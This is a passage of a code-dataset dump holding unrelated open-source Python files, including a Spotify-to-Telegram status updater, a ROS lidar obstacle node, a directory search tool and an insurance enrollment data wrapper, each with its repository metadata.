build/bdist.macosx-10.11-x86_64/egg/django_evolution/builtin_evolutions/auth_unique_together_baseline.py\n# Compiled at: 2018-06-14 23:17:51\nfrom django_evolution.mutations import ChangeMeta\nMUTATIONS = [\n ChangeMeta('Permission', 'unique_together', [\n ('content_type', 
'codename')])]","sub_path":"pycfiles/django_evolution-0.7.8-py2.7/auth_unique_together_baseline.py","file_name":"auth_unique_together_baseline.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"112198261","text":"#!/usr/bin/env python\n#==============================================================================\n#\n# This file is a part of Notalon (http://notalon.org).\n#\n# File: archive.py\n# Description: Wrapper for NEME files (zip files with a phatter extension).\n# Author: Saketh Bhamidipati \n# \n# Copyright (C) 2006-2009 Saketh Bhamidipati.\n#\n#==============================================================================\n\nimport sys\nimport zipfile\nimport os\n\nclass Archive:\n    \"\"\"Wrapper for the Python `zipfile` library. \n    \n    \"\"\"\n    def __init__(self, filename):\n        self.zip = zipfile.ZipFile(filename)\n\n    def get(self, objname):\n        \"\"\"Returns an object with the specified name from the archive. \n\n        If no such object is found, returns None.\n        \n        \"\"\"\n        for name in self.zip.namelist():\n            if name == objname:\n                return self.zip.read(name)\n\n        # If nothing matched, return None\n        return None\n\n","sub_path":"OpenSource Examples/notalon/notalonlib/resource/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"304334704","text":"\n\nfrom xai.brain.wordbase.nouns._windmill import _WINDMILL\n\n#class header\nclass _WINDMILLS(_WINDMILL, ):\n\tdef __init__(self,): \n\t\t_WINDMILL.__init__(self)\n\t\tself.name = \"WINDMILLS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"windmill\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_windmills.py","file_name":"_windmills.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"246304980","text":"import time\r\nimport typing\r\nimport spotipy\r\nimport config\r\nfrom spotipy.oauth2 import SpotifyOAuth\r\nfrom telethon.sync import TelegramClient\r\nfrom telethon import functions, types\r\n\r\napi_id = config.api_id\r\napi_hash = config.api_hash\r\n\r\nspotify = spotipy.Spotify(\r\n\tauth_manager=SpotifyOAuth(\r\n\t\tscope=\"user-read-currently-playing\",\r\n\t\tclient_id=config.client_id,\r\n\t\tclient_secret=config.client_secret,\r\n\t\tredirect_uri=config.redirect_uri,\r\n\t\tusername=config.spotiusername,\r\n\t)\r\n)\r\n\r\n\r\ncurrent_playing = typing.List[typing.Union[str, str, str]]\r\n\r\ndef update_status(_current_playing):\r\n\tcurrent = spotify.current_user_playing_track()\r\n\tif not current is None:\r\n\r\n\t\ttrack = current[\"item\"][\"name\"]\r\n\t\talbum = current[\"item\"][\"album\"][\"name\"]\r\n\t\tartist = current[\"item\"][\"artists\"][0][\"name\"]\r\n\r\n\t\tif _current_playing != [track, album, artist]:\r\n\t\t\tmuzon = \"🎧 Spotify | \" + artist + \" - \" + track\r\n\t\t\t\r\n\t\t\twith TelegramClient('anon', api_id, api_hash) as client:\r\n\t\t\t\tresult = client(functions.account.UpdateProfileRequest(about=muzon))\r\n\t\t\tprint(f\"🎧 Spotify | {track} - {artist}\")\r\n\r\n\t\treturn [track, album, artist]\r\n\r\n\tif not _current_playing is None:\r\n\t\tprint(\"None\")\r\n\t\r\n\treturn\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\twhile True:\r\n\t\t\t# print(\"Fetching updates\")\r\n\t\t\tcurrent_playing = update_status(current_playing)\r\n\t\t\ttime.sleep(8)\r\n\r\n\texcept Exception as 
e:\r\n\t\tprint(e)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116441515","text":"print('\\n\\nstarting!\\n')\n\nimport os\nimport sys\nimport fileinput\nimport re\n\n\ndef replaceAll(file,searchExps, adds):\n with open(file, \"r+\") as f:\n contents = f.read()\n for key in searchExps:\n if key in contents:\n #print(\"\\n\",contents)\n contents = contents.replace(key,searchExps[key])\n print(key,searchExps[key])\n f.seek(0)\n f.truncate()\n f.write(contents)\n f.close()\n\n with open(file, \"r+\") as f:\n contents = f.read()\n for key in adds:\n if key not in contents:\n match = re.search(adds[key]+\":.*\\\\n\", contents)\n add = key + \": \" + str(match.group(0).replace(adds[key]+\": \", \"\")) + \"---\"\n contents = contents.replace(\"\\n---\", add)\n print(\"added\", key)\n f.seek(0)\n f.truncate()\n f.write(contents)\n f.close()\n\nfor filename in os.listdir('/home/ubuntu/mr.hyde/_posts'):\n \"\"\"\n if \"PODCAST\" in filename:\n print(\"\\n\\n\"+filename)\n replaceAll('/home/ubuntu/mr.hyde/_posts/'+filename, {\n \"air_date\":\"published\",\n \"show_name\":\"provider_name\",\n \"short_url\": \"source\",\n \"show_website\": \"provider_url\"\n },\n {\"provider_display\":\"provider_name\"})\n \"\"\"\n\n print(\"\\n\\n\"+filename)\n replaceAll('/home/ubuntu/mr.hyde/_posts/'+filename, {\n \"published\":\"published\"\n },\n {})\n\n","sub_path":"articles/_posts/renaming_stuff.py","file_name":"renaming_stuff.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"253307465","text":"#!/usr/bin/env python\n#/***********-*****************************************************************\n# Frobit lidar obstacle node \n# Copyright (c) 2015-2017, Kjeld Jensen \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#****************************************************************************/\n\"\"\"\nLaserScan tutorial:\nhttp://wiki.ros.org/laser_pipeline/Tutorials/IntroductionToWorkingWithLaserScannerData\n\nRevision\n2015-09-17 KJ First version\n2017-09-21 KJ Implemented a better algorithm\n\"\"\"\n\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nfrom msgs.msg import IntArrayStamped\nfrom obstacle_detect import obstacle_detect\nfrom math import pi\n\nnode_name = 'obstacle'\n\t\nclass ros_node():\n\tdef __init__(self):\n\t\tself.update_rate = 20 # [Hz]\n\t\tself.scans_skipped_cnt = 0\n\t\tself.first_scan = True\n\n\t\t# read parameters\n\t\tself.ahead_warn = rospy.get_param(\"~ahead_threshold_warning\", 3.0) # [m]\n\t\tself.lateral_warn = rospy.get_param(\"~lateral_threshold_warning\", 0.5) # [m]\n\t\tself.ahead_alarm = rospy.get_param(\"~ahead_threshold_alarm\", 1.5) # [m]\n\t\tself.lateral_alarm = rospy.get_param(\"~lateral_threshold_alarm\", 0.5) # [m]\n\t\tself.ang_res = rospy.get_param(\"~angular_resolution\", 1.0) * pi/180.0 # [rad]\n\t\tself.min_range = rospy.get_param(\"~minimum_range\", 0.05) # [m]\n\t\tself.scans_skip = rospy.get_param(\"~scans_skip\", 0) # [m]\n\n\t\t# initialize wall finding algorithm\n\t\tself.od = obstacle_detect(self.ahead_warn, self.lateral_warn, self.ahead_alarm, self.lateral_alarm, self.min_range)\n\n\t\t# get topic names\n\t\tscan_topic = rospy.get_param(\"~scan_sub\", \"/base_scan\")\n\t\tobstacle_topic = rospy.get_param(\"~obstacle_pub\", \"/fmKnowledge/obstacle\")\n\n\t\t# setup wall pose publish topic\n\t\tself.obstacle_msg = IntArrayStamped()\n\t\tself.obstacle_msg.data = [0,0]\n\t\tself.obstacle_pub = rospy.Publisher(obstacle_topic, IntArrayStamped, queue_size=1)\n\n\t\t# setup subscription topic callbacks\n\t\trospy.Subscriber(scan_topic, LaserScan, self.on_scan_topic)\n\n\t\t# sall updater function\n\t\tself.r = rospy.Rate(self.update_rate)\n\t\tself.updater()\n\n\tdef on_scan_topic(self, msg):\n\t\tif self.scans_skipped_cnt == self.scans_skip:\n\t\t\tif self.first_scan == True:\n\t\t\t\tself.first_scan = False\n\t\t\t\t#print msg.angle_min*180/pi, msg.angle_max*180/pi, msg.angle_increment*180/pi, msg.range_min, msg.range_max, len(msg.ranges)\n\n\t\t\t\tself.od.set_params(self.ang_res, len(msg.ranges))\n\t\t\tself.scans_skipped_cnt = 0\n\t\t\tself.obstacle_msg.data = self.od.new_scan(msg.ranges)\n\t\t\tself.publish_obstacle_message()\n\t\telse:\n\t\t\tself.scans_skipped_cnt += 1\n\n\tdef publish_obstacle_message(self):\n\t\tself.obstacle_msg.header.stamp = rospy.get_rostime()\n\t\tself.obstacle_pub.publish(self.obstacle_msg)\n\n\tdef updater(self):\n\t\twhile not rospy.is_shutdown():\n\t\t\tself.od.update()\n\t\t\tself.r.sleep()\n\n# main function. \nif __name__ == '__main__':\n # initialize the node and name it.\n rospy.init_node(node_name)\n\n # go to class functions that do all the heavy lifting. 
Do error checking.\n    try:\n        node_class = ros_node()\n    except rospy.ROSInterruptException: pass\n\n\n","sub_path":"fmProcessors/object_detection/frobit_lidar/scripts/obstacle_detect_node.py","file_name":"obstacle_detect_node.py","file_ext":"py","file_size_in_byte":4504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"344912496","text":"import re\nimport os\nimport argparse\n\n\nclass ScoutCLI():\n    def __init__(self):\n        parser = argparse.ArgumentParser(\n            description='Scout searches through a directory for any string of text you specify.')  # noqa\n        parser.add_argument(\n            '-p',\n            '--path',\n            required=True,\n            help='Where Scout will search for the string specified in each file.'  # noqa\n        )\n        parser.add_argument(\n            '-s',\n            '--search',\n            required=True,\n            help='The string to search for in each file of a path.'\n        )\n        parser.parse_args(namespace=self)\n\n    def run(self):\n        Scout.run(\n            path=self.path,\n            search=self.search,\n        )\n\n\nclass Scout():\n    @classmethod\n    def run(cls, path, search):\n        \"\"\"Run script iterating over each file and directory\n        \"\"\"\n        print('\\n##################\\nGATEKEEPER - SCOUT\\n##################\\n')\n        print('Gatekeeper Scout found the following for your search query:\\n')\n        dirs_to_ignore = [\n            'node_modules',\n            'vendor',\n            '.git',\n            '__pycache__',\n            'build',\n            'dist'\n        ]\n        regex_pattern = re.compile(search)\n\n        # Scout for the search query in all subdirectories of the one specified\n        scout_files = []\n        for root, dirs, files in os.walk(path, topdown=True):\n            dirs[:] = [directory for directory in dirs if directory not in dirs_to_ignore]  # noqa\n            for file in files:\n                filepath = os.path.join(root, file)\n\n                # Open each file and print the findings\n                with open(filepath, 'r') as single_file:\n                    for line_number, line in enumerate(single_file, 1):\n                        data = regex_pattern.findall(line)\n                        for search in data:\n                            message = f'File: {filepath}\\nSearch: {line.strip()}\\nLine: {line_number}\\n'  # noqa\n                            scout_files.append(message)\n                            print(message)\n        return scout_files\n\n\ndef main():\n    ScoutCLI().run()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"gatekeeper/scout.py","file_name":"scout.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"651975578","text":"#coding:utf-8\n\nfrom optparse import OptionParser\nimport SocketServer\nfrom core.ftp_server import FTPHandler\nfrom conf import settings\n\n\nclass ArgvHandler(object):\n    def __init__(self):\n        # Read the command-line arguments\n        self.parser = OptionParser()\n        (options, args) = self.parser.parse_args()\n        self.verify_args(options, args)\n\n    def verify_args(self, options, args):\n        if hasattr(self, args[0]):\n            func = getattr(self, args[0])\n            func()\n        else:\n            self.parser.print_help()\n\n    def start(self):\n        print(\"---start---\")\n        sf = FTPHandler()\n        sf.start()\n        sf.monitor()\n        # # multi-threaded server\n        # server = SocketServer.ThreadingTCPServer((settings.HOST, settings.PORT), FTPHandler)\n        # # listen for connections\n        # server.serve_forever()\n","sub_path":"MadFTPServer/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"591456257","text":"import json\nimport decimal\nimport random\nfrom datetime import datetime\n\nimport flask\nimport re\nfrom dateutil.parser import parse as dateutil_parse\n\nfrom taa import app\nfrom taa.services.agents import AgentService\nfrom taa.services.products import 
ProductService\nfrom taa.services.products.riders import RiderService\nfrom taa.services.enrollments import EnrollmentApplication\n\nproduct_service = ProductService()\nagent_service = AgentService()\nrider_service = RiderService()\n\n\nclass EnrollmentDataWrap(object):\n def __init__(self, wizard_data, case, enrollment_record=None):\n self.data = wizard_data\n self.case = case\n\n # There are times we need the enrollment record (if it has already been created) to determine some aspect\n # of the enrollment, like which agent was the writing agent.\n self.enrollment_record = enrollment_record\n\n def __getitem__(self, item):\n \"\"\"Allow dict access to raw data\"\"\"\n return self.data[item]\n\n def __setitem__(self, item, val):\n self.data[item] = val\n\n def __contains__(self, item):\n return item in self.data\n\n def get(self, key, default=None):\n return self.data.get(key, default)\n\n def is_preview(self):\n return self.data.get('is_preview', False)\n\n def did_decline(self):\n return self.data.get('did_decline', False)\n\n def is_self_enroll(self):\n if self.data.get(\"is_third_party\"):\n return False\n\n # If wizard and not inperson, it is self-enroll.\n if self.data.get('method') == EnrollmentApplication.METHOD_SELF_EMAIL:\n return True\n\n return False\n\n def is_enrollment_type_agent_assisted(self):\n \"\"\"\n For checkbox on the top of the FPP form. For imports, pass data through, otherwise use self_enroll.\n \"\"\"\n if self.data.get('enrollment_type'):\n return self.data['enrollment_type'].lower() == 'a'\n\n return not self.is_self_enroll()\n\n def is_import(self):\n return bool(self.data.get(\"is_third_party\"))\n\n def get_session_type(self):\n if self.data.get(\"is_third_party\"):\n return 'thirdparty'\n elif self.data['method'] == EnrollmentApplication.METHOD_INPERSON:\n return 'inperson'\n else:\n return 'email'\n\n def get_id_type(self):\n if self.data['identityType']:\n return self.data['identityType']\n else:\n return 'email'\n\n def get_id_token(self):\n if self.data['identityToken']:\n return self.data['identityToken']\n else:\n return self.get_employee_email()\n\n def get_agent_signing_name(self):\n if self.data.get('is_third_party'):\n return self.data['agent_name']\n\n agent = self.get_signing_agent()\n if not agent:\n return '(No Agent)'\n\n return agent.signing_name if agent.signing_name else agent.name()\n\n def get_agent_code(self):\n if self.data.get('is_third_party'):\n return self.data['agent_code']\n\n agent = self.get_signing_agent()\n if not agent:\n return '(No Agent)'\n\n return agent.agent_code\n\n def get_signing_agent(self):\n if self.is_self_enroll():\n if self.case.self_enrollment_setup.enrolling_agent:\n return self.case.self_enrollment_setup.enrolling_agent\n elif self.case.owner_agent:\n return self.case.owner_agent\n else:\n # This is not good - the case should not be enrollable without\n # an owner agent.\n raise Exception('Tried to enroll a case without an '\n 'owner agent.')\n elif self.is_import():\n return self.case.owner_agent\n elif self.enrollment_record and self.enrollment_record.agent_id is not None:\n return agent_service.get(self.enrollment_record.agent_id)\n elif agent_service.get_logged_in_agent():\n return agent_service.get_logged_in_agent()\n elif self.data.get('agent_id'):\n return agent_service.get(self.data['agent_id'])\n else:\n # If the logged-in user is not an agent, default to case owner.\n return self.case.owner_agent\n\n def get_employer_name(self):\n return self.case.company_name\n\n def get_product_code(self):\n 
return self.get_product().get_base_product_code()\n\n def get_product(self):\n return product_service.get(self.get_product_id())\n\n def get_product_id(self):\n if 'product_data' in self.data:\n # For backwards compatibility with old data format.\n return self.data['product_data']['id']\n else:\n return self.data['product_id']\n\n def get_employee_name(self):\n return u'{} {}'.format(self.data['employee']['first'],\n self.data['employee']['last'])\n\n def get_employee_first(self):\n return self.data['employee']['first']\n\n def get_employee_last(self):\n return self.data['employee']['last']\n\n def get_employee_birthdate(self):\n return self.data['employee']['birthdate']\n\n def get_employee_ssn(self):\n return self.data['employee']['ssn']\n\n def get_employee_ssn_last_digits(self):\n if self.get_employee_ssn() and len(self.get_employee_ssn()) >= 4:\n return self.get_employee_ssn()[-4:]\n\n return ''\n\n def get_employee_street(self):\n address = self.data['employee']['address1']\n if self.data['employee']['address2']:\n address += ' {}'.format(self.data['employee']['address2'])\n return address\n\n def get_employee_city_state_zip(self):\n return \"{}, {} {}\".format(\n self.data['employee']['city'],\n self.data['employee']['state'],\n self.data['employee']['zip']\n )\n\n def get_spouse_name(self):\n return u'{} {}'.format(self.data['spouse']['first'],\n self.data['spouse']['last'])\n\n def get_spouse_ssn(self):\n return self.data['spouse']['ssn']\n\n def get_employee_email(self):\n email_to = self.data['employee']['email']\n if not email_to:\n # fallback email if none was entered - just need a unique address\n email_to = '{}@5StarEnroll.com'.format(self.random_email_id())\n\n return email_to\n\n invalid_email_chars = re.compile(r'[^a-zA-Z0-9!#$%&\\'*+\\/=?^_`{|}~\\.-]')\n\n def _sanitize_email_str(self, val):\n # Replace invalid characters with empty string\n return self.invalid_email_chars.sub('', val)\n\n def get_employee_email_parts(self):\n if '@' not in self.get_employee_email():\n return '', self.get_employee_email()\n else:\n return self.get_employee_email().split('@', 1)\n\n def random_email_id(self, token_length=10):\n chars = 'ABCDEF0123456789'\n return ''.join([random.choice(chars)\n for _ in range(token_length)])\n\n def get_employee_date_of_hire(self):\n try:\n # The identityToken is the date_of_hire on FPP products.\n return dateutil_parse(self.data['identityToken'])\n except Exception:\n return None\n\n def did_employee_select_coverage(self):\n return (self.data.get('employee_coverage') and (self.data['employee_coverage'].get('premium') or\n self.data['employee_coverage'].get('face_value')))\n\n def get_employee_coverage(self):\n coverage = self.data['employee_coverage']\n return self.format_coverage(coverage)\n\n def get_employee_coverage_tier(self):\n coverage = self.data.get('employee_coverage')\n if not coverage:\n return None\n return coverage.get('coverage_selection')\n\n def format_coverage(self, coverage):\n if 'face_value' in coverage:\n return format(coverage['face_value'], ',.0f')\n elif 'coverage_selection' in coverage:\n coverage_selection = coverage['coverage_selection']\n if coverage_selection == True:\n return 'Included'\n elif coverage_selection in ['EE', 'ES', 'EC', 'EF']:\n return 'Included'\n else:\n return coverage_selection\n else:\n raise ValueError(coverage)\n\n def get_formatted_employee_premium(self):\n return self.format_money(self.get_employee_premium())\n\n def get_employee_premium(self):\n return 
decimal.Decimal(self.data['employee_coverage']['premium'])\n\n def did_spouse_select_coverage(self):\n\n # Special case for static benefit\n if self.data.get('spouse_coverage') and self.get_product().is_static_benefit() and self.did_employee_select_coverage():\n return True\n\n elif self.get_product().is_simple_coverage():\n if not 'employee_coverage' in self.data:\n return False\n \n return self.get_product().is_applicant_covered(\n 'spouse',\n # This uses employee coverage to determine if spouse is included.\n self.data['employee_coverage']['coverage_selection'])\n\n return (self.data.get('spouse_coverage') and (self.data['spouse_coverage'].get('premium') or\n self.data['spouse_coverage'].get('face_value')))\n\n def get_spouse_coverage(self):\n return self.format_coverage(self.data['spouse_coverage'])\n\n def get_formatted_spouse_premium(self):\n return self.format_money(self.get_spouse_premium())\n\n def get_spouse_premium(self):\n if self.get_product().is_employee_premium_only():\n return decimal.Decimal('0.00')\n return decimal.Decimal(self.data['spouse_coverage']['premium'])\n\n def format_money(self, amount):\n return '%.2f' % amount\n\n def get_total_children_premium(self):\n if self.get_product().is_fpp():\n # Add up the child premium for each child if this is FPP\n return sum(decimal.Decimal(unicode(child_coverage.get('premium', '0.00')))\n for child_coverage in self.data[\"child_coverages\"])\n else:\n # Just use the first child premium, if any.\n if len(self.data[\"child_coverages\"]) > 0:\n child_coverage = self.data[\"child_coverages\"][0]\n return decimal.Decimal(unicode(child_coverage.get('premium', '0.00')))\n\n return decimal.Decimal('0.00')\n\n def get_total_modal_premium(self):\n total = decimal.Decimal('0.00')\n if self.did_employee_select_coverage():\n total += self.get_employee_premium()\n if self.did_spouse_select_coverage():\n total += self.get_spouse_premium()\n if self.get_total_children_premium() > 0.0:\n total += self.get_total_children_premium()\n\n return total\n\n def get_num_covered_children(self):\n return len(self.get_covered_children())\n\n def get_covered_children(self):\n covered_children, coverages = self.get_covered_children_with_coverages()\n return covered_children\n\n def get_child_coverage(self, child_num=0):\n return self.format_coverage(self.data['child_coverages'][child_num])\n \n def get_covered_children_with_coverages(self):\n covered_children = []\n coverages = []\n \n if not self.data.get('child_coverages'):\n return covered_children, coverages\n \n for i, child in enumerate(self.data['children']):\n coverage = self.data['child_coverages'][i]\n if self.is_child_coverage_valid(coverage):\n covered_children.append(child)\n coverages.append(coverage)\n \n return covered_children, coverages\n \n def is_child_coverage_valid(self, coverage):\n return (coverage and (coverage.get('face_value') or\n self.get_product().is_static_benefit() or\n (coverage.get('coverage_selection') and\n self.get_product().is_simple_coverage() and\n self.get_product().is_applicant_covered('children',\n coverage['coverage_selection']))))\n\n def get_absolute_child_index(self, covered_child_index):\n \n current_covered_index = 0\n \n for i, child in enumerate(self.data['children']):\n coverage = self.data['child_coverages'][i]\n if self.is_child_coverage_valid(coverage):\n # We found a covered child, this is either the one we were looking for, or we look for the next one.\n if current_covered_index == covered_child_index:\n return i\n else:\n current_covered_index += 1\n 
\n # Shouldn't get here.\n raise ValueError(\"Invalid covered child index\")\n \n def get_child_premium(self, child_num=0):\n if self.get_product().is_employee_premium_only():\n return decimal.Decimal('0.00')\n\n return decimal.Decimal(self.data['child_coverages'][child_num]['premium'])\n\n def get_formatted_child_premium(self, child_num=0):\n return self.format_money(self.get_child_premium(child_num))\n\n def get_employee_soh_questions(self):\n if 'soh_questions' in self.data['employee']:\n # Legacy format\n questions = self.data['employee']['soh_questions']\n else:\n questions = self.data['employee_soh_questions']\n\n # Filter out questions only intended for spouse\n return [q for q in questions if not q.get('is_spouse_only')]\n\n def get_spouse_soh_questions(self):\n if 'soh_questions' in self.data['spouse']:\n # Legacy format\n questions = self.data['spouse']['soh_questions']\n else:\n questions = self.data['spouse_soh_questions']\n\n # Filter out questions intended for employee only.\n return [q for q in questions if not q.get('is_employee_only')]\n\n def get_child_soh_questions(self, child_index):\n child = self.data['children'][child_index]\n if 'soh_questions' in child:\n # Backwards compat for legacy data format:\n questions = child['soh_questions']\n else:\n questions = self.data['children_soh_questions'][child_index]\n\n # Filter out emp and sp only questions\n return [q for q in questions if not q.get('is_employee_only') and not q.get('is_spouse_only')]\n \n def get_covered_child_soh_questions(self, child_index):\n # Same as above but interpret the index as an index into the covered_children only.\n abs_child_index = self.get_absolute_child_index(child_index)\n return self.get_child_soh_questions(abs_child_index)\n \n def get_employee_esignature(self):\n if self.should_use_call_center_workflow():\n # Replace employee signature with \"John Doe voice auth on file 02:45pm\"\n date = self.enrollment_record.signature_time\n esig = u\"{} voice auth on file {}\".format(self.get_employee_name(), date.strftime(\"%l:%M%p\").strip().lower())\n return self.data.get('emp_sig_txt', esig)\n elif self.did_employee_sign_in_wizard():\n date = self.enrollment_record.signature_time\n esig = u\"{} esigned {}\".format(self.get_employee_name(), date.strftime(\"%l:%M%p\").strip().lower())\n return self.data.get('emp_sig_txt', esig)\n else:\n return self.data.get('emp_sig_txt', '')\n\n def get_employee_esignature_date(self):\n date = self.enrollment_record.signature_time\n return self.data.get('emp_sig_date', date.strftime('%m/%d/%Y'))\n\n def get_employee_initials(self):\n return self.data.get('emp_initials_txt', '')\n\n def has_employee_esigned(self):\n return bool(self.get_employee_esignature())\n\n def get_agent_esignature(self):\n if self.should_use_call_center_workflow() or self.did_finish_signing_in_wizard():\n date = self.enrollment_record.signature_time\n esig = u'{} esigned {}'.format(self.get_agent_signing_name(), date.strftime(\"%l:%M%p\").strip().lower())\n return self.data.get('agent_sig_txt', esig)\n elif self.enrollment_record.agent_signing_datetime:\n # Agent signed at some point later most likely\n date = self.enrollment_record.agent_signing_datetime\n esig = u'{} esigned {}'.format(self.get_agent_signing_name(), date.strftime(\"%l:%M%p\").strip().lower())\n return esig\n else:\n return self.data.get('agent_sig_txt', '')\n\n def get_agent_esignature_date(self):\n if self.enrollment_record.agent_signing_datetime:\n date = self.enrollment_record.agent_signing_datetime\n else:\n date = 
self.enrollment_record.signature_time\n \n # If a date is provided in the enrollment data, it overrides the above date.\n return self.data.get('agent_sig_date', date.strftime('%m/%d/%Y'))\n\n def has_agent_esigned(self):\n return bool(self.get_agent_esignature())\n\n def get_agent_initials(self):\n return self.data.get('agent_initials_txt', '')\n\n def get_beneficiary_data(self):\n bene_data = {\n 'employee_primary': [],\n 'employee_contingent': [],\n 'spouse_primary': [],\n 'spouse_contingent': [],\n }\n\n # \"Shorthand\" beneficiary settings\n if self.data.get('employee_beneficiary', '') == 'spouse':\n bene_data['employee_primary'] += [\n self.get_beneficiary_family_member('spouse')\n ]\n if (self.data.get('spouse_beneficiary', '') == 'spouse' or\n self.data.get('spouse_beneficiary', '') == 'employee'):\n bene_data['spouse_primary'] += [\n self.get_beneficiary_family_member('employee')\n ]\n\n from taa.services.enrollments import EnrollmentRecordParser\n for num in range(1, EnrollmentRecordParser.MAX_BENEFICIARY_COUNT + 1):\n if self.data.get('employee_beneficiary{}_name'.format(num)):\n bene_data['employee_primary'] += [\n self.get_beneficiary_dict('employee_beneficiary{}'.format(num))\n ]\n if self.data.get('employee_contingent_beneficiary{}_name'.format(num)):\n bene_data['employee_contingent'] += [\n self.get_beneficiary_dict('employee_contingent_beneficiary{}'.format(num))\n ]\n if self.data.get('spouse_beneficiary{}_name'.format(num)):\n bene_data['spouse_primary'] += [\n self.get_beneficiary_dict('spouse_beneficiary{}'.format(num))\n ]\n if self.data.get('spouse_contingent_beneficiary{}_name'.format(num)):\n bene_data['spouse_contingent'] += [\n self.get_beneficiary_dict('spouse_contingent_beneficiary{}'.format(num))\n ]\n\n # Trim beneficiaries if needed, as the shorthand beneficiary logic may\n # allow too many primary benficiaries to be set\n bene_data['employee_primary'] = bene_data['employee_primary'][:EnrollmentRecordParser.MAX_BENEFICIARY_COUNT+1]\n bene_data['spouse_primary'] = bene_data['spouse_primary'][:EnrollmentRecordParser.MAX_BENEFICIARY_COUNT+1]\n\n return bene_data\n\n def get_beneficiary_family_member(self, prefix, relationship='spouse'):\n bd = self.data[prefix]['birthdate']\n\n bene_dict = dict(\n name='{} {}'.format(self.data[prefix]['first'],\n self.data[prefix]['last']),\n ssn=self.data[prefix]['ssn'],\n relationship=relationship,\n birthdate=bd,\n percentage=100,\n )\n\n return bene_dict\n\n def get_beneficiary_dict(self, prefix):\n bd = self.data['{}_dob'.format(prefix)]\n\n bene_dict = dict(\n name=self.data['{}_name'.format(prefix)],\n ssn=self.data['{}_ssn'.format(prefix)],\n relationship=self.data['{}_relationship'.format(prefix)],\n birthdate=bd,\n percentage=self.data['{}_percentage'.format(prefix)],\n )\n\n return bene_dict\n\n def has_multiple_beneficiaries(self):\n \"\"\"returns True if any of the beneficiaries are not at 100%\"\"\"\n bene_pattern = re.compile('_bene\\d+_percentage$')\n\n for key, value in self.data.iteritems():\n if bene_pattern.search(key) and value and value.isdigit() and int(value) < 100:\n return True\n\n return False\n\n def should_include_bank_draft(self):\n return self.case.include_bank_draft_form\n\n def should_use_call_center_workflow(self):\n return self.case.should_use_call_center_workflow\n\n def get_actively_at_work(self):\n product = self.get_product()\n # TODO: Possibly change the output value of this in the future\n if product.is_fpp() and product.is_guaranteed_issue() and self.case.omit_actively_at_work:\n return 
'GI'\n else:\n if product.is_fpp() and self.case.omit_actively_at_work and not product.is_guaranteed_issue():\n return ''\n\n if 'is_employee_actively_at_work' in self.data:\n val = self.data['is_employee_actively_at_work']\n else:\n # Import format\n val = self.data['actively_at_work']\n\n return 'yes' if val else 'no'\n\n def get_third_party_enrollment_id(self):\n if self.data.get('third_party_enrollment_id'):\n return self.data['third_party_enrollment_id']\n else:\n return None\n\n def get_effective_date(self):\n if self.data.get('effective_date'):\n return dateutil_parse(self.data.get('effective_date'))\n \n # Look for effective date for this product on one of the coverage records (they should all have the same date).\n for coverage_record in self.get_coverage_records():\n if coverage_record.effective_date:\n return coverage_record.effective_date\n \n # Fall back to the signature time / application date.\n return self.enrollment_record.signature_time\n\n def get_coverage_records(self):\n \"Returns the coverage records associated with this product\"\n return filter(lambda r: r.product_id == self.get_product_id(), self.enrollment_record.coverages)\n \n def get_applicant_data(self):\n applicants = []\n\n effective_date = self.get_effective_date().strftime(\"%m/%d/%Y\")\n\n if self.enrollment_record.payment_mode:\n payment_mode = \"{}\".format(self.enrollment_record.payment_mode)\n else:\n payment_mode = \"{}\".format(self.case.payment_mode)\n \n if self.did_employee_select_coverage():\n coverage = self.get_employee_coverage()\n\n premium = self.get_formatted_employee_premium()\n premium_amount = self.get_employee_premium()\n applicant_effective_date = effective_date\n else:\n coverage = 'WAIVED'\n premium = ''\n premium_amount = 